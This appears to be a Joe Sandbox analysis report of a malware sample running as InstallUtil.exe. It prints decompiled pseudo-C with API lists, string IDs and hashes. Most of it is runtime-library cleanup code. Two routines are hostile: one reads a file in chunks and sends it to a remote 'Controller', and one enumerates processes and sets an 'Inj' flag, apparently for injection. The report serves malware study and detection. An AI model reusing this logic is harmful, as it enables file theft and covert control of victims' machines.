                                                                      					if(_t45 != 0 &&  *_t45 == 0) {
                                                                      						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                                      						if(_t46 != 0 &&  *_t46 == 0) {
                                                                      							E004427C2(_t46);
                                                                      							E0044C273( *((intOrPtr*)(_t74 + 0x88)));
                                                                      						}
                                                                      						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                                      						if(_t47 != 0 &&  *_t47 == 0) {
                                                                      							E004427C2(_t47);
                                                                      							E0044C72D( *((intOrPtr*)(_t74 + 0x88)));
                                                                      						}
                                                                      						E004427C2( *((intOrPtr*)(_t74 + 0x7c)));
                                                                      						E004427C2( *((intOrPtr*)(_t74 + 0x88)));
                                                                      					}
                                                                      				}
                                                                      				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                                      				if(_t26 != 0 &&  *_t26 == 0) {
                                                                      					E004427C2( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                                      					E004427C2( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                                      					E004427C2( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                                      					E004427C2( *((intOrPtr*)(_t74 + 0x8c)));
                                                                      				}
                                                                      				E0044D1AA( *((intOrPtr*)(_t74 + 0x9c)));
                                                                      				_t28 = 6;
                                                                      				_t16 = _t74 + 0xa0; // 0xaa
                                                                      				_t55 = _t16;
                                                                      				_v8 = _t28;
                                                                      				_t18 = _t74 + 0x28; // 0x32
                                                                      				_t70 = _t18;
                                                                      				do {
                                                                      					if( *((intOrPtr*)(_t70 - 8)) != 0x46c298) {
                                                                      						_t31 =  *_t70;
                                                                      						if(_t31 != 0 &&  *_t31 == 0) {
                                                                      							E004427C2(_t31);
                                                                      							E004427C2( *_t55);
                                                                      						}
                                                                      						_t28 = _v8;
                                                                      					}
                                                                      					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                                      						_t29 =  *((intOrPtr*)(_t70 - 4));
                                                                      						if(_t29 != 0 &&  *_t29 == 0) {
                                                                      							E004427C2(_t29);
                                                                      						}
                                                                      						_t28 = _v8;
                                                                      					}
                                                                      					_t55 = _t55 + 4;
                                                                      					_t70 = _t70 + 0x10;
                                                                      					_t28 = _t28 - 1;
                                                                      					_v8 = _t28;
                                                                      				} while (_t28 != 0);
                                                                      				return E004427C2(_t74);
                                                                      			}

                                                                      APIs
                                                                      • ___free_lconv_mon.LIBCMT ref: 0044D07B
                                                                        • Part of subcall function 0044C273: _free.LIBCMT ref: 0044C290
                                                                        • Part of subcall function 0044C273: _free.LIBCMT ref: 0044C2A2
                                                                        • Part of subcall function 0044C273: _free.LIBCMT ref: 0044C2B4
                                                                        • Part of subcall function 0044C273: _free.LIBCMT ref: 0044C2C6
                                                                        • Part of subcall function 0044C273: _free.LIBCMT ref: 0044C2D8
                                                                        • Part of subcall function 0044C273: _free.LIBCMT ref: 0044C2EA
                                                                        • Part of subcall function 0044C273: _free.LIBCMT ref: 0044C2FC
                                                                        • Part of subcall function 0044C273: _free.LIBCMT ref: 0044C30E
                                                                        • Part of subcall function 0044C273: _free.LIBCMT ref: 0044C320
                                                                        • Part of subcall function 0044C273: _free.LIBCMT ref: 0044C332
                                                                        • Part of subcall function 0044C273: _free.LIBCMT ref: 0044C344
                                                                        • Part of subcall function 0044C273: _free.LIBCMT ref: 0044C356
                                                                        • Part of subcall function 0044C273: _free.LIBCMT ref: 0044C368
                                                                      • _free.LIBCMT ref: 0044D070
                                                                        • Part of subcall function 004427C2: HeapFree.KERNEL32(00000000,00000000,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A), ref: 004427D8
                                                                        • Part of subcall function 004427C2: GetLastError.KERNEL32(0000000A,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A,0000000A), ref: 004427EA
                                                                      • _free.LIBCMT ref: 0044D092
                                                                      • _free.LIBCMT ref: 0044D0A7
                                                                      • _free.LIBCMT ref: 0044D0B2
                                                                      • _free.LIBCMT ref: 0044D0D4
                                                                      • _free.LIBCMT ref: 0044D0E7
                                                                      • _free.LIBCMT ref: 0044D0F5
                                                                      • _free.LIBCMT ref: 0044D100
                                                                      • _free.LIBCMT ref: 0044D138
                                                                      • _free.LIBCMT ref: 0044D13F
                                                                      • _free.LIBCMT ref: 0044D15C
                                                                      • _free.LIBCMT ref: 0044D174
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                      • String ID:
                                                                      • API String ID: 161543041-0
                                                                      • Opcode ID: db87e76f01b6c0d76bf9a05853fd87c53c52e7524eae72500f86ea9097737d9b
                                                                      • Instruction ID: 56ea24ff2f01d8a93610e14486895ba8636919e893ca4bd9fd263a5f033710de
                                                                      • Opcode Fuzzy Hash: db87e76f01b6c0d76bf9a05853fd87c53c52e7524eae72500f86ea9097737d9b
                                                                      • Instruction Fuzzy Hash: AB315C31A042009FFB20AA7AD985B5773E9EF11714F54842FF548D7252DF79AC408B28
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 80%
                                                                      			E0040725D(void* __ecx, char _a4, char _a8, char _a28, void* _a32, char _a52) {
                                                                      				char _v12;
                                                                      				void* _v16;
                                                                      				char _v28;
                                                                      				void* _v40;
                                                                      				char _v52;
                                                                      				void* _v56;
                                                                      				char _v64;
                                                                      				char _v76;
                                                                      				void* _v80;
                                                                      				char _v100;
                                                                      				void* _v104;
                                                                      				char _v116;
                                                                      				char _v124;
                                                                      				char _v128;
                                                                      				signed int _v140;
                                                                      				char _v144;
                                                                      				char _v148;
                                                                      				struct %anon52 _v156;
                                                                      				char _v164;
                                                                      				void* _v168;
                                                                      				struct %anon52 _v176;
                                                                      				union _LARGE_INTEGER* _v180;
                                                                      				void* _v184;
                                                                      				intOrPtr _v188;
                                                                      				long _v192;
                                                                      				signed int _v196;
                                                                      				intOrPtr _v200;
                                                                      				union _LARGE_INTEGER* _v204;
                                                                      				union _LARGE_INTEGER _v208;
                                                                      				intOrPtr _v216;
                                                                      				intOrPtr _v220;
                                                                      				long _v224;
                                                                      				signed int _v228;
                                                                      				intOrPtr _v236;
                                                                      				signed int _v244;
                                                                      				intOrPtr _v248;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				void* _t94;
                                                                      				void* _t101;
                                                                      				void* _t111;
                                                                      				void* _t113;
                                                                      				void* _t121;
                                                                      				signed int _t134;
                                                                      				void* _t135;
                                                                      				signed int _t136;
                                                                      				void* _t146;
                                                                      				void* _t150;
                                                                      				void* _t161;
                                                                      				void* _t164;
                                                                      				signed int _t167;
                                                                      				struct _OVERLAPPED* _t169;
                                                                      				struct %anon52 _t192;
                                                                      				signed int _t208;
                                                                      				void* _t214;
                                                                      				union _LARGE_INTEGER* _t247;
                                                                      				void* _t255;
                                                                      				void* _t256;
                                                                      				union _LARGE_INTEGER _t261;
                                                                      				void* _t262;
                                                                      				void* _t264;
                                                                      				void* _t265;
                                                                      				void* _t267;
                                                                      				void* _t268;
                                                                      				void* _t269;
                                                                      				void* _t270;
                                                                      				void* _t271;
                                                                      				void* _t276;
                                                                      
                                                                      				_t266 =  &_v184;
                                                                      				_v140 = _v140 & 0x00000000;
                                                                      				_t255 = __ecx;
                                                                      				_v176.LowPart = 0x186a0;
                                                                      				if(_a4 != 0) {
                                                                      					_t161 = E00407A23(0x4610ec);
                                                                      					_t278 = _t161;
                                                                      					if(_t161 != 0) {
                                                                      						_t276 =  &_v184 - 0x18;
                                                                      						E0040773A(_t167, _t276, 0x4610ec, _t278,  &_a8);
                                                                      						_t164 = E00417C45(_t167,  &_v52, 0x4610ec, _t264);
                                                                      						_t266 = _t276 + 0x18;
                                                                      						E00401ED3( &_a28, 0x4610ec, _t256, _t164);
                                                                      						E00401EC9();
                                                                      					}
                                                                      				}
                                                                      				E00404804(_t255);
                                                                      				E0040489F(_t255, _t256, _t255);
                                                                      				_t94 = E00418445(_t167,  &_v124,  &_a28);
                                                                      				_t267 = _t266 - 0x18;
                                                                      				_t246 = E00402ED0(_t167,  &_v52, E00402ED0(_t167,  &_v28, E00402ED0(_t167,  &_v100, E00418445(_t167,  &_v76,  &_a4), _t264, _t278, 0x46e260), _t264, _t278,  &_a52), _t264, _t278, 0x46e260);
                                                                      				E00402E61(_t267, _t99, _t94);
                                                                      				_push(0xb6);
                                                                      				_t101 = E00404A78(_t255, _t99, _t278);
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				if((_t167 & 0xffffff00 | _t101 == 0xffffffff) == 0) {
                                                                      					_t169 = 0;
                                                                      					_t265 = CreateFileW(E00401EC4( &_v12), 0x80000000, 1, 0, 3, 0x80, 0);
                                                                      					__eflags = _t265 - 0xffffffff;
                                                                      					if(__eflags != 0) {
                                                                      						_v148 = 0;
                                                                      						_v144 = 0;
                                                                      						__imp__GetFileSizeEx( &_v148);
                                                                      						_t247 = _v156.HighPart;
                                                                      						_t192 = _v156;
                                                                      						_v176 = _t192;
                                                                      						_v180 = _t247;
                                                                      						_v208.LowPart = _t192;
                                                                      						_v200 = _t247;
                                                                      						_v196 = 1;
                                                                      						_v192 = 0;
                                                                      						_t111 = E00452F70(_t192, _t247, 0x186a0, 0);
                                                                      						asm("adc edx, ebx");
                                                                      						_t113 = E0041830B(0,  &_v140, _t247, _t111 + 1, _t247);
                                                                      						_t268 = _t267 - 0x10;
                                                                      						E00402E61(_t268, E00402ED0(0,  &_v164, E0041830B(0,  &_v116, _t247, _v192, _v196), _t265, __eflags, 0x46e260), _t113);
                                                                      						E00404A78(_t255, _t115, __eflags, 0xb7, _t265);
                                                                      						E00401F98();
                                                                      						E00401F98();
                                                                      						E00401F98();
                                                                      						_t121 = E004183E5( &_v192,  &_v64);
                                                                      						_t269 = _t268 - 0x18;
                                                                      						_t251 = "Uploading file to Controller: ";
                                                                      						E004052D4(0, _t269, "Uploading file to Controller: ", _t265, __eflags, _t121);
                                                                      						_t270 = _t269 - 0x14;
                                                                      						E00402053(0, _t270, "Uploading file to Controller: ", _t265, "i");
                                                                      						E00417D02(0, _t255);
                                                                      						_t271 = _t270 + 0x30;
                                                                      						_t208 =  &_v196;
                                                                      						E00401F98();
                                                                      						asm("xorps xmm0, xmm0");
                                                                      						asm("movlpd [esp+0x40], xmm0");
                                                                      						__eflags = _v228;
                                                                      						if(__eflags < 0) {
                                                                      							L22:
                                                                      							CloseHandle(_t265);
                                                                      							E00404DFD(_t251);
                                                                      							_t169 = 1;
                                                                      							goto L23;
                                                                      						}
                                                                      						if(__eflags > 0) {
                                                                      							L11:
                                                                      							_t261 = 0;
                                                                      							__eflags = 0;
                                                                      							_v204 = _v180;
                                                                      							_v208.LowPart = _v184;
                                                                      							_t134 = 0x186a0;
                                                                      							goto L12;
                                                                      							do {
                                                                      								do {
                                                                      									L12:
                                                                      									_t246 = _v220;
                                                                      									__eflags = _t261 - _t246;
                                                                      									if(__eflags < 0) {
                                                                      										L16:
                                                                      										_push(_t134);
                                                                      										_t135 = E004310E6(_t208, _t246, _t261, __eflags);
                                                                      										_push(_t169);
                                                                      										_t262 = _t135;
                                                                      										_v192 = _t169;
                                                                      										_v184 = _t262;
                                                                      										_t136 = SetFilePointerEx(_t265, _v208.LowPart, _v204, _t169);
                                                                      										__eflags = _t136;
                                                                      										if(_t136 == 0) {
                                                                      											_t272 = _t271 - 0x18;
                                                                      											_t214 = _t271 - 0x18;
                                                                      											_push("SetFilePointerEx error");
                                                                      											L27:
                                                                      											E00402053(_t169, _t214, _t246, _t265);
                                                                      											E00402053(_t169, _t272 - 0x18, _t246, _t265, "E");
                                                                      											E00417D02(_t169, _t255);
                                                                      											E004310EF(_t262);
                                                                      											CloseHandle(_t265);
                                                                      											L28:
                                                                      											E00404DFD(_t246);
                                                                      											goto L23;
                                                                      										}
                                                                      										__eflags = ReadFile(_t265, _t262, _v224,  &_v192, _t169);
                                                                      										if(__eflags == 0) {
                                                                      											_t272 = _t271 - 0x18;
                                                                      											_t214 = _t271 - 0x18;
                                                                      											_push("ReadFile error");
                                                                      											goto L27;
                                                                      										}
                                                                      										_t146 = E00402077(_t169,  &_v144, _t246, _t265, __eflags, _t262, _v192);
                                                                      										_t271 = _t271 - 0x18;
                                                                      										_t253 = E00402ED0(_t169,  &_v176, E0041830B(_t169,  &_v128, _t246, _v224, _v220), _t265, __eflags, 0x46e260);
                                                                      										E00402E61(_t271, _t148, _t146);
                                                                      										_push(0x52);
                                                                      										_t150 = E00404A78(_t255, _t148, __eflags);
                                                                      										__eflags = _t150 - 0xffffffff;
                                                                      										E00401F98();
                                                                      										E00401F98();
                                                                      										E00401F98();
                                                                      										__eflags = _t169 & 0xffffff00 | _t150 == 0xffffffff;
                                                                      										if((_t169 & 0xffffff00 | _t150 == 0xffffffff) != 0) {
                                                                      											E00404DFD(_t253);
                                                                      											CloseHandle(_t265);
                                                                      											E004310EF(_v204);
                                                                      											goto L5;
                                                                      										}
                                                                      										goto L19;
                                                                      									}
                                                                      									_t208 = _v228;
                                                                      									if(__eflags > 0) {
                                                                      										L15:
                                                                      										_t134 = _t208;
                                                                      										_v188 = _t246;
                                                                      										_v224 = _t134;
                                                                      										goto L16;
                                                                      									}
                                                                      									__eflags = _t134 - _t208;
                                                                      									if(__eflags <= 0) {
                                                                      										goto L16;
                                                                      									}
                                                                      									goto L15;
                                                                      									L19:
                                                                      									E004310EF(_v204);
                                                                      									_t134 = _v244;
                                                                      									_v248 = _v248 - _t134;
                                                                      									_t261 = _v208;
                                                                      									asm("sbb [esp+0x20], esi");
                                                                      									_v236 = _v236 + 1;
                                                                      									_t251 = _v224;
                                                                      									_t169 = 0;
                                                                      									asm("adc [esp+0x24], ebx");
                                                                      									_t208 = _v228 + _t134;
                                                                      									_v228 = _t208;
                                                                      									asm("adc edx, esi");
                                                                      									_v224 = _t251;
                                                                      									__eflags = _t251 - _v220;
                                                                      								} while (__eflags < 0);
                                                                      								if(__eflags > 0) {
                                                                      									goto L22;
                                                                      								}
                                                                      								__eflags = _t208 - _v216;
                                                                      							} while (_t208 < _v216);
                                                                      							goto L22;
                                                                      						}
                                                                      						__eflags = _v196;
                                                                      						if(_v196 <= 0) {
                                                                      							goto L22;
                                                                      						}
                                                                      						goto L11;
                                                                      					}
                                                                      					E00402053(0, _t267 - 0x18, _t246, _t265, 0x461084);
                                                                      					_push(0x53);
                                                                      					E00404A78(_t255, _t246, __eflags);
                                                                      					goto L28;
                                                                      				} else {
                                                                      					E00404DFD(_t246);
                                                                      					L5:
                                                                      					_t169 = 0;
                                                                      					L23:
                                                                      					E00401EC9();
                                                                      					E00401EC9();
                                                                      					E00401F98();
                                                                      					return _t169;
                                                                      				}
                                                                      			}









































































Address column of the listing above:
0x0040725d 0x00407263 0x00407274 0x00407276 0x0040727e 0x0040728c 0x00407291 0x00407293
0x00407295 0x004072a2 0x004072ae 0x004072b3 0x004072be 0x004072ca 0x004072ca 0x00407293
0x004072d1 0x004072d9 0x004072e9 0x004072ee 0x00407343 0x00407347 0x0040734d 0x00407354
0x00407366 0x00407372 0x0040737b 0x00407387 0x00407390 0x00407397 0x004073a7 0x004073cc
0x004073ce 0x004073d1 0x004073f4 0x004073fa 0x004073fe 0x00407404 0x0040740d 0x00407417
0x0040741c 0x00407420 0x00407424 0x00407428 0x0040742c 0x00407430 0x0040743b 0x0040743f
0x00407444 0x00407475 0x00407482 0x0040748b 0x00407497 0x004074a0 0x004074b0 0x004074b5
0x004074b8 0x004074c0 0x004074c5 0x004074cf 0x004074d4 0x004074d9 0x004074dc 0x004074e0
0x004074e5 0x004074e8 0x004074ee 0x004074f2 0x00407646 0x00407647 0x0040764f 0x00407654
0x00000000 0x00407654 0x004074f8 0x00407504 0x00407508 0x00407508 0x0040750a 0x00407512
0x00407516 0x00407516 0x0040751b 0x0040751b 0x0040751b 0x0040751b 0x0040751f 0x00407521
0x00407537 0x00407537 0x00407538 0x0040753e 0x00407544 0x00407546 0x0040754e 0x00407553
0x00407559 0x0040755b 0x004076b2 0x004076b5 0x004076b7 0x004076bc 0x004076bc 0x004076cb
0x004076d0 0x004076d6 0x004076df 0x004076e5 0x004076e7 0x00000000 0x004076e7 0x00407574
0x00407576 0x004076a6 0x004076a9 0x004076ab 0x00000000 0x004076ab 0x00407585 0x0040758a
0x004075b7 0x004075bb 0x004075c1 0x004075c5 0x004075ca 0x004075d4 0x004075e0 0x004075e9
0x004075ee 0x004075f0 0x0040768b 0x00407691 0x0040769b 0x00000000 0x004076a0 0x00000000
0x004075f0 0x00407523 0x00407527 0x0040752d 0x0040752d 0x0040752f 0x00407533 0x00000000
0x00407533 0x00407529 0x0040752b 0x00000000 0x00000000 0x00000000 0x004075f6 0x004075fa
0x004075ff 0x00407603 0x00407607 0x0040760b 0x0040760f 0x00407614 0x0040761f 0x00407620
0x00407624 0x00407626 0x0040762a 0x0040762c 0x00407630 0x00407630 0x0040763a 0x00000000
0x00000000 0x0040763c 0x0040763c 0x00000000 0x0040751b 0x004074fa 0x004074fe 0x00000000
0x00000000 0x00000000 0x004074fe 0x004073dd 0x004073e2 0x004073e6 0x00000000 0x00407399
0x0040739b 0x004073a0 0x004073a0 0x00407656 0x0040765d 0x00407669 0x00407675 0x00407686
0x00407686

                                                                      APIs
                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 004073C6
                                                                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 004073FE
                                                                      • __aulldiv.LIBCMT ref: 00407430
                                                                        • Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D
                                                                        • Part of subcall function 00417D02: GetLocalTime.KERNEL32(00000000), ref: 00417D1C
                                                                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407553
                                                                      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040756E
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00407647
                                                                      • CloseHandle.KERNEL32(00000000,00000052), ref: 00407691
                                                                      • CloseHandle.KERNEL32(00000000), ref: 004076DF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                      • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                      • API String ID: 3086580692-2596673759
                                                                      • Opcode ID: 7daad74c97f216f0ae18c6d5d1713522e760e9c118621a1d33a4109b5a99cdfc
                                                                      • Instruction ID: 367b02927c7d86f21e8ffbef9c58bf59a5b62df31991f00e361bcf90bbefc0a3
                                                                      • Opcode Fuzzy Hash: 7daad74c97f216f0ae18c6d5d1713522e760e9c118621a1d33a4109b5a99cdfc
                                                                      • Instruction Fuzzy Hash: E5B1C2316083409FC314FB25C882AAFB7E5AFC5358F40492FF44A622D1EF7999458B5B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 97%
                                                                      			E0040CF95(void* __eflags, char _a4) {
                                                                      				char _v0;
                                                                      				void* _v8;
                                                                      				char _v24;
                                                                      				short _v524;
                                                                      				char _v540;
                                                                      				char _v1060;
                                                                      				char _v1088;
                                                                      				void* _v1092;
                                                                      				char _v1108;
                                                                      				char _v1112;
                                                                      				char _v1120;
                                                                      				void* _v1124;
                                                                      				void* _v1132;
                                                                      				char _v1136;
                                                                      				char _v1164;
                                                                      				char _v1184;
                                                                      				char _v1188;
                                                                      				char _v1192;
                                                                      				char _v1196;
                                                                      				void* _v1200;
                                                                      				char _v1208;
                                                                      				void* _v1212;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				void* _t55;
                                                                      				intOrPtr* _t84;
                                                                      				void* _t90;
                                                                      				void* _t94;
                                                                      				void* _t95;
                                                                      				void* _t98;
                                                                      				void* _t103;
                                                                      				struct _SECURITY_ATTRIBUTES* _t108;
                                                                      				char* _t113;
                                                                      				void* _t160;
                                                                      				void* _t165;
                                                                      				void* _t166;
                                                                      				void* _t167;
                                                                      
                                                                      				_t167 =  &_v1196;
                                                                      				_t108 = 0;
                                                                      				GetModuleFileNameW(0,  &_v524, 0x104);
                                                                      				_t153 = "1";
                                                                      				if(E00407A23("1") != 0) {
                                                                      					L14:
                                                                      					E00401ED3( &_a4, _t153, _t163, E00417E9D(_t108,  &_v1108, _t153));
                                                                      					_t113 =  &_v1112;
                                                                      					E00401EC9();
                                                                      					_t55 = E004186B9(_t113);
                                                                      					__eflags = _t55;
                                                                      					if(_t55 != 0) {
                                                                      						_push(_t113);
                                                                      						_t161 = L"Program Files\\";
                                                                      						_t165 = E0040D69B( &_a4, L"Program Files\\");
                                                                      						__eflags = _t165 - 0xffffffff;
                                                                      						if(_t165 != 0xffffffff) {
                                                                      							E0040D6BA(_t108,  &_v0, _t153, _t161, _t166, _t165, E00438416(L"Program Files\\"), L"Program Files (x86)\\");
                                                                      						}
                                                                      					}
                                                                      					_t154 =  &_a4;
                                                                      					__eflags = E0040ECDF( &_v524,  &_a4);
                                                                      					if(__eflags != 0) {
                                                                      						L22:
                                                                      						E00401EC9();
                                                                      						return _t108;
                                                                      					} else {
                                                                      						L18:
                                                                      						_t160 = CreateMutexA(_t108, 1, E00401F6B(E00401E25(0x46e600, _t154, _t166, _t171, 7)));
                                                                      						E0040209F(_t108,  &_v1136);
                                                                      						E00401EC4(0x46e588);
                                                                      						E004189A5( &_v1136);
                                                                      						E00401F6B( &_v1136);
                                                                      						if(E004150C2(E00401EC4( &_v0)) == 0) {
                                                                      							CloseHandle(_t160);
                                                                      						} else {
                                                                      							_t108 = 1;
                                                                      							E00410DEB(0x46e5a0, E00401F6B(0x46e5a0), "Inj", 1);
                                                                      						}
                                                                      						E00401F98();
                                                                      						goto L22;
                                                                      					}
                                                                      				}
                                                                      				E00401F46(0,  &_v1196);
                                                                      				_t166 = CreateToolhelp32Snapshot(2, 0);
                                                                      				_v1088 = 0x22c;
                                                                      				_push( &_v1088);
                                                                      				Process32FirstW(_t166);
                                                                      				while(Process32NextW(_t166,  &_v1092) != 0) {
                                                                      					E0040413E(_t108,  &_v1184, _t153, _t166,  &_v1060);
                                                                      					_t84 = E004022C5( &_v1188,  &_v1164);
                                                                      					_t163 = E0040228A( &_v1192,  &_v1164);
                                                                      					E00408448( &_v1164,  *((intOrPtr*)(E004022C5( &_v1196,  &_v1164))),  *_t86,  *_t84);
                                                                      					_t167 = _t167 + 0xc;
                                                                      					_t153 =  &_v24;
                                                                      					_t90 = E0040A060( &_v24);
                                                                      					__eflags = _t90;
                                                                      					if(_t90 != 0) {
                                                                      						E00401ED3( &_v1208, _v1088, _t163, E0041871D( &_v1120, _v1088));
                                                                      						E00401EC9();
                                                                      						_t94 = E00407A23( &_v540);
                                                                      						__eflags = _t94;
                                                                      						if(_t94 == 0) {
                                                                      							_t153 = 0x4610ec;
                                                                      							_t95 = E00407A23(0x4610ec);
                                                                      							__eflags = _t95;
                                                                      							if(_t95 != 0) {
                                                                      								L12:
                                                                      								E00401EC9();
                                                                      								L13:
                                                                      								E00401EC9();
                                                                      								goto L14;
                                                                      							}
                                                                      							_t98 = E004186E7(_v1088);
                                                                      							__eflags = _t98;
                                                                      							if(_t98 != 0) {
                                                                      								goto L12;
                                                                      							}
                                                                      							E0040A00F( &_v1208);
                                                                      							E00401EC9();
                                                                      							break;
                                                                      						}
                                                                      						E00401EC9();
                                                                      						E00401EC9();
                                                                      						goto L22;
                                                                      					}
                                                                      					E00401EC9();
                                                                      				}
                                                                      				CloseHandle(_t166);
                                                                      				_t153 = 0x4610ec;
                                                                      				_t103 = E00407A23(0x4610ec);
                                                                      				_t171 = _t103;
                                                                      				if(_t103 != 0) {
                                                                      					goto L13;
                                                                      				}
                                                                      				E00401EC9();
                                                                      				goto L18;
                                                                      			}


                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,0046E600,00000000,?,00000001), ref: 0040CFAF
                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040CFDA
                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040CFF6
                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040D075
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040D084
                                                                      • _wcslen.LIBCMT ref: 0040D197
                                                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000007,00000000,?,00000001), ref: 0040D1DD
                                                                      • CloseHandle.KERNEL32(00000000,?,00000001), ref: 0040D246
                                                                        • Part of subcall function 0041871D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00418732
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32_wcslen
                                                                      • String ID: Inj$Program Files (x86)\$Program Files\
                                                                      • API String ID: 2701142382-2211889894
                                                                      • Opcode ID: 4fc4cf5d6ef372622b163ed33b4117bfbf0ddf7ea9fafd9375a68d2d06735402
                                                                      • Instruction ID: 5500f8629f1523b62fbb441cdd828a3a8cd3e0a01c70736722aead03e22f43ed
                                                                      • Opcode Fuzzy Hash: 4fc4cf5d6ef372622b163ed33b4117bfbf0ddf7ea9fafd9375a68d2d06735402
                                                                      • Instruction Fuzzy Hash: 686184711083418BC614FB61C895EAF73A8AF9034CF40093EB586631E2EF78994ECA5B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 97%
                                                                      			E0044C371(void* __edx, char _a4) {
                                                                      				void* _v8;
                                                                      				void* _v12;
                                                                      				signed int _v16;
                                                                      				intOrPtr* _v20;
                                                                      				signed int _v24;
                                                                      				char _v28;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t105;
                                                                      				char _t195;
                                                                      				char _t210;
                                                                      				signed int _t213;
                                                                      				void* _t224;
                                                                      				char* _t226;
                                                                      				signed int _t227;
                                                                      				signed int _t231;
                                                                      				signed int _t232;
                                                                      				void* _t234;
                                                                      				void* _t236;
                                                                      				signed int _t237;
                                                                      				signed int _t238;
                                                                      				signed int _t239;
                                                                      				signed int _t240;
                                                                      				signed int _t241;
                                                                      				signed int _t242;
                                                                      				signed int _t243;
                                                                      				signed int _t244;
                                                                      				signed int _t245;
                                                                      				signed int _t246;
                                                                      				signed int _t247;
                                                                      				signed int _t248;
                                                                      				signed int _t249;
                                                                      				signed int _t250;
                                                                      				signed int _t251;
                                                                      				signed int _t252;
                                                                      				signed int _t253;
                                                                      				signed int _t254;
                                                                      				signed int _t255;
                                                                      				signed int _t256;
                                                                      				char* _t257;
                                                                      
                                                                      				_t224 = __edx;
                                                                      				_t210 = _a4;
                                                                      				_v16 = 0;
                                                                      				_v28 = _t210;
                                                                      				_v24 = 0;
                                                                      				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
                                                                      					_t234 = E00441BB3(0, 1, 0x50);
                                                                      					_v8 = _t234;
                                                                      					E004427C2(0);
                                                                      					if(_t234 != 0) {
                                                                      						_t227 = E00441BB3(0, 1, 4);
                                                                      						_v12 = _t227;
                                                                      						E004427C2(0);
                                                                      						if(_t227 != 0) {
                                                                      							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
                                                                      								_t213 = 0x14;
                                                                      								memcpy(_v8, 0x46c178, _t213 << 2);
                                                                      								L25:
                                                                      								_t236 = _v8;
                                                                      								_t231 = _v16;
                                                                      								 *_t236 =  *( *(_t210 + 0x88));
                                                                      								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
                                                                      								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
                                                                      								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
                                                                      								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
                                                                      								 *_v12 = 1;
                                                                      								if(_t231 != 0) {
                                                                      									 *_t231 = 1;
                                                                      								}
                                                                      								goto L27;
                                                                      							}
                                                                      							_t232 = E00441BB3(0, 1, 4);
                                                                      							_v16 = _t232;
                                                                      							E004427C2(0);
                                                                      							if(_t232 != 0) {
                                                                      								_t233 =  *((intOrPtr*)(_t210 + 0xac));
                                                                      								_t14 = _t234 + 0xc; // 0xc
